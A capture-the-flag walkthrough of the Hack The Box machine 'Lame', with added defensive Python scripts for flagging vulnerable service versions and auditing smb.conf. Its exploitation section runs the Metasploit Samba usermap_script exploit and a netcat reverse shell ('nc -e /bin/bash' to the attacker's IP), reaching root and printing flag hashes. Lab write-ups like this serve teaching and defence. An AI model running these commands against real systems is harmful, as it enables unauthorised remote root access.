Lame
- OS: Linux
- Difficulty: Easy
- IP address: 10.10.10.3
- Date: 14 / 03 / 2017
Port scan
# Nmap 7.92 scan initiate as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.3 -p 21,22,139,445,3632
Nmap scan report for 10.10.10.3
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.17.44
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time:
|_clock-skew: mean: 2h01m21s, deviation: 2h49m45s, median: 1m18s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 52.51 seconds
The machine has ports 21 (FTP), 22 (SSH), 139 and 445 (SMB), and 3632 (distccd) open.
FTP enumeration
As nmap reports, we can log in over FTP with the anonymous credentials:
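As an added example (not part of the original writeup), the following Python script turns the nmap output above into a service inventory and flags the versions this writeup later identifies as exploitable: vsftpd 2.3.4 (CVE-2011-2523, from the page) and the Samba 3.0.20 < 3.0.25rc3 "username map script" range reported by searchsploit. The scan lines embedded in the script are a constructed copy of the PORT table above so that it runs offline; the regular expressions and the version range approximation are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample: a copy of the PORT/STATE/SERVICE/VERSION table from the
# scan above, embedded here so the example runs without a live host.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# Version patterns this writeup identifies as exploitable. The vsftpd CVE id is
# the one given in the writeup; the Samba pattern approximates the
# "3.0.20 < 3.0.25rc3" range that searchsploit reports (3.0.20 .. 3.0.24).
KNOWN_BAD = [
    (re.compile(r"vsftpd 2\.3\.4\b"),
     "vsftpd 2.3.4 backdoor (CVE-2011-2523)"),
    (re.compile(r"Samba smbd 3\.0\.2[0-4]\b"),
     "Samba 'username map script' command execution"),
]

# One row of nmap's normal-output PORT table: "21/tcp open ftp vsftpd 2.3.4"
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap(text):
    """Parse the PORT table of nmap's normal output into Service records."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header line, "|" script output, blank lines
        port, proto, state, name, version = m.groups()
        services.append(Service(int(port), proto, state, name, version.strip()))
    return services


def flag_known_bad(services):
    """Return (port, finding) pairs for services whose version matches KNOWN_BAD."""
    findings = []
    for svc in services:
        for pattern, label in KNOWN_BAD:
            if pattern.search(svc.version):
                findings.append((svc.port, label))
    return findings


if __name__ == "__main__":
    for port, label in flag_known_bad(parse_nmap(SAMPLE_SCAN)):
        print(f"{port}/tcp: {label}")
```

Run against the scan above it reports ports 21 and 445; the generic "3.X - 4.X" banner on 139 is deliberately not matched, since that string carries no exact version to act on.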
$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:rocky): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
But there is nothing inside.
We can look for exploits for this version of the FTP service (vsFTPd 2.3.4) with searchsploit:
$ searchsploit vsftp 2.3.4
------------------------------------------------------- ----------------------
Exploit Title | Path
------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
------------------------------------------------------- ----------------------
Shellcodes: No Results
OK, it looks like we can get remote command execution (RCE) on this version (CVE-2011-2523). If we inspect the exploit's source code, there appears to be a backdoor for the user nergal:) that opens a shell on port 6200. However, it is not exploitable.
SMB enumeration
Let's look for exploits for Samba 3.0.20 in searchsploit:
$ searchsploit Samba 3.0.20
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
-------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
Great, there is one that gives us RCE.
Gaining access to the machine
We will use Metasploit for this:
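From the defender's side, the issue searchsploit lists is tied to the `username map script` directive in smb.conf, and the nmap host scripts above also reported guest access in use and message signing disabled. As an added example (not part of the original writeup), here is a small Python audit that parses an smb.conf and reports those three settings; the two configurations it checks are constructed samples, not the target machine's file, and the `server signing` and `map to guest` option names are standard Samba options I assume to be present.

```python
# Constructed sample configurations (not taken from the target machine).
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   ; script hooked in to rewrite client usernames
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = Bad User

[tmp]
   path = /tmp
   writable = yes
"""

HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   server signing = mandatory
   map to guest = Never
"""


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}}, comments dropped."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
            continue
        if "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][key.strip().lower()] = value.strip()
    return conf


def audit_smb_conf(text):
    """Return a list of findings for the [global] section of an smb.conf."""
    g = parse_smb_conf(text).get("global", {})
    findings = []
    # The directive behind the "username map script" command execution that
    # searchsploit reports for Samba 3.0.20 < 3.0.25rc3.
    if "username map script" in g:
        findings.append(
            f"username map script is set ({g['username map script']}); "
            "remove it or upgrade Samba past the affected 3.0.2x releases")
    # nmap reported "message_signing: disabled (dangerous, but default)".
    if g.get("server signing", "").lower() != "mandatory":
        findings.append("server signing is not mandatory (SMB signing disabled)")
    # nmap reported "account_used: guest"; Samba's default for this key is Never.
    if g.get("map to guest", "never").lower() != "never":
        findings.append(
            f"map to guest = {g['map to guest']} allows unauthenticated guest sessions")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_smb_conf(conf) or ["no findings"])
```

The weak sample produces three findings and the hardened one none; removing the directive only closes the command-execution path, so the version check from the port-scan section is still the authoritative fix.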
# msfconsole -q
msf6 > search Samba 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Command shell session 1 opened (10.10.17.44:4444 -> 10.10.10.3:40626) at 2022-07-17 18:24:10 +0200
which nc
/bin/nc
nc -e /bin/bash 10.10.17.44 5555
I decided to use a second reverse shell to get a full TTY in nc:
$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:54564.
script /dev/null -c bash
root@lame:/# ^Z
zsh: suspended ncat -nlvp 5555
$ stty raw -echo; fg
[1] + continued ncat -nlvp 5555
Erase set to delete.
Kill set to control-U (^U).
Interrupt set to control-C (^C).
root@lame:/# export TERM=xterm
root@lame:/# export SHELL=bash
root@lame:/# stty rows 50 columns 158
Privilege escalation
We are already root, so we only have to grab the flags:
root@lame:/# ls /home
ftp makis service user
root@lame:/# find /home -name user.txt
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
56c5a638db443c0dd212990228c55aec
root@lame:/# cat /root/root.txt
490c7ed2a8c6e7a72d719d478938accc